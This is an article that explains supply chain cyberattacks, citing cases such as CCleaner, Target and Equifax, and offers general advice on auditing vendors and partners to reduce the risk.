How to Reduce the Impact of Supply Chain Attacks by Cybersecurity Procedures

Data protection and user privacy are in high demand this year. Enterprises are racing to uphold the right data security procedures and implement the right process to maintain compliance and integrity. Security professionals and data protection officers need to monitor and scrutinize any inbound, outbound, or storage activities happening to the data in their organization, especially now with the GDPR in full effect.

Better data management and security efforts are more essential than ever, but with different types of cyber attacks evolving every day, security professionals' skills are going to be tested. Whether it's the latest crypto-jacking threat or simple fileless device take-over attacks, data is always at risk. Do you know that even if you have the right security controls in place, your data can still be accessed via an application vulnerability at your suppliers' end? Yes, your corporate data can be compromised by breaches into your suppliers' or partners' networks using a hacking technique called supply chain attacks.

What Is a Supply Chain Attack?

Since enterprise networks often have the correct security controls in place, hackers will focus on weaker networks. A supply chain attack is when a hacker infiltrates a weak link in your supply chain— like the network of one of your suppliers, service providers, or partners — and uses that network as an indirect route into your network.

How Do Supply Chain Attacks Happen?

One way that a hacker can infiltrate a network is by manipulating the devices or hardware that enters that network. They do this by intercepting a delivery from a supplier and injecting malicious code directly onto the devices being shipped. If done skillfully, neither the supplier nor the consumer would be aware of the malicious code.

Another method, as demonstrated by the recent CCleaner attack, is executed by injecting malware into the software itself by breaking into a developer's infrastructure. The hacker gains access to the developer's network either by spear phishing or email-based attacks, then uses an internal vulnerability in the network, like EternalBlue, to access every system. Once the hacker has access to the developer's testing environment, they can implant malware into the code that provides them with a backdoor into any device that's installed this software. Considering manufacturers' privacy policies and end-user license agreements, any software found to contain malicious code will undoubtedly make the developer of that code liable for any damages.

Additionally, there's a simple form of supply chain attacks that involves taking over the web servers a vendor uses to send out updates. A hacker can infiltrate that server and modify a patch to include malware, quickly hitting many devices.

Why Is it Difficult to Defend Against These Attacks?

Each vendor uses different applications and hardware to develop a product, so it's hard to design a defense that applies to every vendor.

What's more, supply chain attacks can be more devastating than other attacks, like ransomware, since they often go unrecognized.

Two famous examples of supply chain attacks are the 2013 Target breach and the 2017 Equifax breach. Target's servers were breached because credentials were stolen from one of its third-party vendors, while Equifax failed to patch a known vulnerability in the web framework it used. Another historic example is the Heartbleed bug, which was an OpenSSL flaw that affected many websites, mobile devices, and software from major vendors.

With the market moving towards cloud computing, the risk of supply chain attacks will accelerate. Things like cloud-based software and Internet of Things (IoT) devices are easier avenues of attack, since they aren't under the direct vigilance of organizations. All this software and hardware has its own supply chains, which, when exploited, leave data completely insecure.

How Can Enterprises Reduce the Risk of Supply Chain Attacks?

Enterprises need to evaluate their partners, suppliers, re-sellers, and service providers in a variety of ways. They need to ensure that each organization's IT security, data protection, user privacy, and security policies are being defined and audited periodically. Many companies have begun requiring third parties to satisfy certain security conditions as part of their service-level agreement. Only after a third party proves their security compliance and protection over their data flow will these cautious companies do business with them. For some companies, this means conducting their own penetration test to check the third party's security layers.

Partnering with big names will carry very less risk compared to small firms, as the latter might not have the right cybersecurity controls in place. Even then, according to a 2017 Ponemon Institute report, attacks against small and medium businesses are on the rise and more than half of the respondents indicated that their budget isn't sufficient to support a fully effective security posture.

For enterprises to remain secure, they need to be confident that their suppliers, partners, and service providers have all established good cybersecurity procedures to collaboratively nullify supply chain attacks. However, for many organizations, this means starting from scratch. They need to make sure the right security controls are in place at every potential attack vector by employing both a reactive approach like incident response management and a proactive approach like endpoint security management.